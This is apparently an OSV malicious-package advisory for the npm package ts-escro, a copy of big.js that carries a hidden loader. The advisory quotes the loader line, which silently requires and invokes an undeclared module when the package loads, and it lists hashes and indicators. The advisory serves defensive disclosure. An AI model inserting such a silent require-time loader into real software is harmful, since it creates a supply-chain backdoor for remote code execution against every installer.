{"id":"MAL-2026-6319","summary":"Malicious code in ts-escro (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (26030cb7301c4ff9ea68753581f70290a957e1422b425df7119416fea126c324)\nThe package ships a verbatim copy of MikeMcl/big.js v7.0.1 (same banner, MIT copyright, and API) but is published under a different name (ts-escro). At module load time, big.js line 606 (and big.mjs:606) executes `try { const doc = require('parket-slot'); doc.from_str().then(e =\u003e {}).catch(e =\u003e {}) } catch (error) {}`, silently attempting to load and invoke an undeclared third-party module 'parket-slot' with all errors swallowed. The package.json declares no dependency on 'parket-slot'; the only declared dependency is a non-resolvable local filesystem path `log-taker: file:../log-taker`, which indicates the artifact was published from a staging directory and could not have been produced through normal release engineering. Any consumer that require()s ts-escro triggers the hidden loader. Whoever controls future publishes of the 'parket-slot' name turns every ts-escro install into remote code execution at require-time. The impersonation-of-big.js cover, undeclared loader, swallowed errors, and broken staging dependency together establish a typosquat-loader / stager pattern with clear malicious intent.\n","modified":"2026-06-23T17:01:25.678853562Z","published":"2026-06-23T16:11:18Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","sha256":"26030cb7301c4ff9ea68753581f70290a957e1422b425df7119416fea126c324","modified_time":"2026-06-23T16:11:18Z","id":"IN-MAL-2026-007261","import_time":"2026-06-23T16:54:12.607906457Z","versions":["0.0.6"]},{"versions":["0.0.8"],"id":"IN-MAL-2026-007268","modified_time":"2026-06-23T16:11:24Z","sha256":"9b5a10f4679dd3b65ce4cdfb738644518a1c9836b2ce648277d1bcb449c496e3","import_time":"2026-06-23T16:54:13.323926281Z","source":"amazon-inspector"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/ts-escro/v/0.0.6"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/ts-escro/v/0.0.8"}],"affected":[{"package":{"name":"ts-escro","ecosystem":"npm","purl":"pkg:npm/ts-escro"},"versions":["0.0.6","0.0.8"],"database_specific":{"indicators":{"evidence_files":[{"tlsh":"24c2658c3ac67579593363788f4a5088eb38525712c8b186b4ae63b46f78cb107b5fdc","path":"big.js","sha256":"5b803b2bbd43db704b5802fa5bf4da96e79c3b876d74495116b53a837101dace"},{"path":"package.json","tlsh":"2a213467c9a19da70af89b947c6c43aaf1151b1f00a04c17b07b130c4b3355b2096bbd","sha256":"a251278e6809c3040aaa0554ba72d81061908ef2cad299aa88a4c016007ffc34"}],"package_integrity":[{"hashes":{"sha512_sri":"sha512-hACLJvXwrtiI9k+vXOGryzvweY8mLm300CxpmMB3l6VKPbkS+DZh4RExfcM2k5p0T6n0Y0zNvLp1Bgsi/tt9+w==","sha1":"88178fbc3cc1bbaf621c008374e07c6736a9260f"},"filename":"ts-escro-0.0.6.tgz"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ts-escro/MAL-2026-6319.json","cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}